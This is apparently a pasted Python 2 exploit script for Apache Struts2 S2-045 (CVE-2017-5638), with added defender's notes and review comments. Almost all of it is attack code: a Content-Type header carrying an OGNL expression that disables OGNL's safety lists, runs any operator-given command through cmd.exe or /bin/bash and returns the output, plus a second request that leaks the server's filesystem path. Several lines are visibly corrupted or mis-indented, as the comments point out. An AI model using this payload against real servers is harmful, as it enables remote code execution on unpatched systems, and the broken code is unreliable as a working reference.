
Untitled

Mar 28th, 2017
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3.  
  4. import urllib2
  5. import requests
  6. import httplib
  7.  
  8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  9.  
  10. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  11.  
  12. #usage: python script.py <url> "<command>"
  13.  
def exploit(url, cmd):
    """Send one GET request whose Content-Type header carries an OGNL expression (S2-045, CVE-2017-5638).

    url: target URL, taken from the command line by the caller.
    cmd: command string spliced verbatim into the OGNL payload (see the
        ``'%s'`` substitution below).

    Returns the requests.Response object on the normal path. On the
    IncompleteRead branch it returns ``e.partial`` instead -- see the
    NOTE there, that branch does not behave as the caller expects.

    Defender's notes:
      * The indicator is a Content-Type request header whose value starts
        with ``%{`` and contains OGNL tokens (``#context``, ``#_memberAccess``,
        ``ProcessBuilder``). Inspecting that header at the WAF / reverse proxy
        or in access logs is enough to detect this traffic; the payload never
        needs a request body.
      * Mitigation is the vendor fix for S2-045 (fixed version not stated on
        this page); at the edge, reject Content-Type values that are not a
        plain media type.
    """
    # The value is prefixed with "Content-Type:" again inside the header value;
    # the server-side error path echoes it into an OGNL evaluation.
    payload  = "Content-Type:%{(#_='multipart/form-data')."
    # NOTE(review): "[email protected]" here is not valid OGNL -- it looks like
    # the paste site's e-mail obfuscation rewrote part of this line. Left as-is.
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    # Emptying the two exclusion lists removes OGNL's package/class
    # allow-list checks for the rest of the expression.
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    # cmd is interpolated unquoted into a single-quoted OGNL string; a quote in
    # cmd breaks the expression rather than being escaped.
    payload += "(#cmd='%s')." % cmd
    # os.name decides between cmd.exe and /bin/bash as the launcher.
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    # Process output (stdout+stderr merged above) is copied straight into the
    # HTTP response body, which is why the caller prints request.text.
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:

        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        #request = urllib2.Request(url, headers=headers)
        # verify=False disables TLS certificate validation for this request
        # (the matching InsecureRequestWarning is silenced at module level).
        request = requests.get(url, headers=headers,verify=False)
        #page = urllib2.urlopen(request).read()

    # Python 2 only syntax ("except X, e"); this file does not run on Python 3.
    except httplib.IncompleteRead, e:

        # NOTE(review): e.partial is raw bytes, not a Response, so the
        # `request.text` below raises AttributeError on this branch. Also,
        # requests normally wraps IncompleteRead in its own exception type, so
        # this handler is unlikely to fire at all -- confirm before relying on it.
        request = e.partial
    print(request.text)

    return request
  46.  
def getpath(url):
    """Send the same S2-045 header-borne OGNL expression, but ask for the web app's real filesystem path.

    url: target URL, taken from the command line by the caller.

    Prints ``"Path App: "`` followed by the response body; returns None.

    Defender's notes: the on-the-wire indicator is identical to exploit() --
    a Content-Type header starting with ``%{`` -- so one detection rule covers
    both requests this script sends.
    """
    payload = "Content-Type:%{(#_='multipart/form-data')."
    # NOTE(review): "[email protected]" here is not valid OGNL -- it looks like
    # the paste site's e-mail obfuscation rewrote part of this line. Left as-is.
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    # Emptying the two exclusion lists removes OGNL's package/class
    # allow-list checks for the rest of the expression.
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    # getRealPath("/") of the servlet context is written to the response body.
    payload += "(#path=(@org.apache.struts2.ServletActionContext@getServletContext().getRealPath(\"/\")))."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.CopyUtils@copy(#path,#ros))."
    payload += "(#ros.flush())}"

    try:

        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        #request = urllib2.Request(url, headers=headers)
        # verify=False disables TLS certificate validation for this request.
        request = requests.get(url, headers=headers,verify=False)
        #page = urllib2.urlopen(request).read()
    # Python 2 only syntax ("except X, e"); this file does not run on Python 3.
    except httplib.IncompleteRead, e:
        # NOTE(review): e.partial is raw bytes, so `request.text` below raises
        # AttributeError on this branch (same issue as in exploit()).
        request = e.partial
    print("Path App: "+ request.text)
  72.  
  73.  
if __name__ == '__main__':
    # Entry point: expects exactly two positional arguments, <url> and <cmd>.
    # NOTE(review): indentation below is inconsistent -- `cmd = ...`, the
    # second print and `getpath(url)` sit at the `if` level while the lines
    # around them are inside `else:`. As pasted, Python raises IndentationError
    # for this block before anything runs. Left unchanged here.

    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py <url> <cmd>")

    else:

        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
    cmd = sys.argv[2]
        print("[*] cmd: %s" % cmd)
    print("[*] url: %s" % url)
        exploit(url, cmd)
    getpath(url)